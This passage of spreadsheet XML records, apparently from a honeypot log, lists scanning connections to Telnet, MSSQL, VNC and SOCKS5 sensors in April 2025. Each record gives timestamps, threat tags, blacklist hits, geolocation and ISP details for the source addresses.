    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d02:9581"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2515"/>
    <x v="2515"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T00:55:05"/>
    <d v="2025-04-09T00:55:05"/>
    <d v="2025-04-09T00:55:05"/>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df:5c86"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2516"/>
    <x v="2516"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T00:45:08"/>
    <d v="2025-04-09T00:45:08"/>
    <d v="2025-04-09T00:45:08"/>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3d01:8b97"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2517"/>
    <x v="2517"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T00:41:25"/>
    <d v="2025-03-28T06:07:55"/>
    <d v="2025-04-09T00:41:25"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H12"/>
    <s v="5900&amp;&amp;1080&amp;&amp;NA&amp;&amp;21"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="Microsoft Corporation"/>
    <s v="business"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;NA&amp;&amp;{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d8:f8d9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2518"/>
    <x v="2518"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T00:41:00"/>
    <d v="2025-04-08T13:54:56"/>
    <d v="2025-04-09T00:41:00"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:ac5b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2519"/>
    <x v="2519"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T00:24:51"/>
    <d v="2024-11-26T09:04:28"/>
    <d v="2025-04-09T00:24:51"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="138195"/>
    <s v="MOACK.Co.LTD"/>
    <s v="HENGDA"/>
    <s v="business"/>
    <s v="Hengda Network Limited"/>
    <s v="2017-09-20"/>
    <s v="HENGDA-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca35:8a7f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2520"/>
    <x v="2520"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T00:24:30"/>
    <d v="2023-11-25T19:28:53"/>
    <d v="2025-04-09T00:24:30"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="33106&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}"/>
    <n v="46"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="JM"/>
    <s v="Jamaica"/>
    <s v="02"/>
    <s v="Saint Andrew Parish"/>
    <s v="Trench Town"/>
    <s v="Kingston"/>
    <s v="3489854"/>
    <s v="10"/>
    <s v="17.9892"/>
    <s v="-76.8024"/>
    <s v="11580"/>
    <s v="Island Networks Ltd"/>
    <s v="Island Networks Ltd"/>
    <s v="business"/>
    <s v="Island Networks Ltd"/>
    <s v="2009-08-03"/>
    <s v="ISLAND-NET"/>
    <s v="2012-06-05"/>
    <s v="connection"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4a74:3a14"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2521"/>
    <x v="2521"/>
    <s v="179-240-252-69.3g.claro.net.br"/>
    <x v="0"/>
    <d v="2025-04-09T00:03:26"/>
    <d v="2025-04-09T00:03:26"/>
    <d v="2025-04-09T00:03:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Garça"/>
    <s v="Garça"/>
    <s v="3462580"/>
    <s v="NA"/>
    <s v="-22.2106"/>
    <s v="-49.6561"/>
    <s v="22085"/>
    <s v="AS22085"/>
    <s v="Claro S/A"/>
    <s v="consumer"/>
    <s v="Claro S/A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-01-13 00:00:00"/>
    <s v="2027-01-13 00:00:00"/>
    <s v="2025-01-14 00:00:00"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="published"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b3f0:fc45"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2522"/>
    <x v="2522"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T23:39:36"/>
    <d v="2025-04-08T23:39:36"/>
    <d v="2025-04-08T23:39:36"/>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8:b4d8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2523"/>
    <x v="2523"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T23:34:00"/>
    <d v="2025-04-08T20:56:19"/>
    <d v="2025-04-08T23:34:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>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business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:3e1b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2524"/>
    <x v="2524"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T22:57:14"/>
    <d v="2025-02-24T07:36:29"/>
    <d v="2025-04-08T22:57:14"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="45"/>
    <s v="Jeollabuk-do"/>
    <s v="Gimje-si"/>
    <s v="Gimje-si (Yochon-dong)"/>
    <s v="1842211"/>
    <s v="NA"/>
    <s v="35.8186"/>
    <s v="126.891"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3c7:c65d"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2525"/>
    <x v="2525"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T22:55:20"/>
    <d v="2025-04-08T22:55:20"/>
    <d v="2025-04-08T22:55:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanniyakumari"/>
    <s v="Kuzhithurai"/>
    <s v="1265387"/>
    <s v="NA"/>
    <s v="8.31792"/>
    <s v="77.1919"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:410b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2526"/>
    <x v="2526"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T22:48:40"/>
    <d v="2025-04-08T22:46:23"/>
    <d v="2025-04-08T22:48:40"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Paschim Bardhaman"/>
    <s v="Durgapur (Bidhannagar)"/>
    <s v="1272175"/>
    <s v="713215"/>
    <s v="23.5279"/>
    <s v="87.3425"/>
    <s v="45609"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="2007-07-06"/>
    <s v="BHARTI-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7563:3cd1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2527"/>
    <x v="2527"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T22:47:37"/>
    <d v="2024-04-19T11:14:40"/>
    <d v="2025-04-08T22:47:37"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="59406&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}"/>
    <n v="64"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;NA&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc52:d169"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2528"/>
    <x v="2528"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T22:38:27"/>
    <d v="2025-04-08T22:38:27"/>
    <d v="2025-04-08T22:38:27"/>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1:3391"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2529"/>
    <x v="2529"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T22:12:52"/>
    <d v="2025-04-08T22:12:52"/>
    <d v="2025-04-08T22:12:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:d4d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2530"/>
    <x v="2530"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T22:04:27"/>
    <d v="2025-04-08T22:04:27"/>
    <d v="2025-04-08T22:04:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:9aae"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2531"/>
    <x v="2531"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T21:49:53"/>
    <d v="2025-04-08T21:49:53"/>
    <d v="2025-04-08T21:49:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="East"/>
    <s v="Shakar Pur Baramad"/>
    <s v="13156977"/>
    <s v="NA"/>
    <s v="28.6208"/>
    <s v="77.2794"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:744a:1de8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2532"/>
    <x v="2532"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T21:40:11"/>
    <d v="2025-04-08T21:40:11"/>
    <d v="2025-04-08T21:40:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:4190"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2533"/>
    <x v="2533"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T21:30:16"/>
    <d v="2025-04-08T21:26:43"/>
    <d v="2025-04-08T21:30:16"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:fffc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2534"/>
    <x v="2534"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T21:26:44"/>
    <d v="2025-04-02T05:34:46"/>
    <d v="2025-04-08T21:26:44"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WI"/>
    <s v="Wisconsin"/>
    <s v="Sheboygan"/>
    <s v="Adell"/>
    <s v="5243587"/>
    <s v="53001"/>
    <s v="43.5483"/>
    <s v="-87.9424"/>
    <s v="36001"/>
    <s v="Bertram Communications LLC"/>
    <s v="Bertram Communications LLC"/>
    <s v="business"/>
    <s v="Bertram Communications LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d167:ebe1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2535"/>
    <x v="2535"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T21:06:41"/>
    <d v="2025-04-08T21:06:41"/>
    <d v="2025-04-08T21:06:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
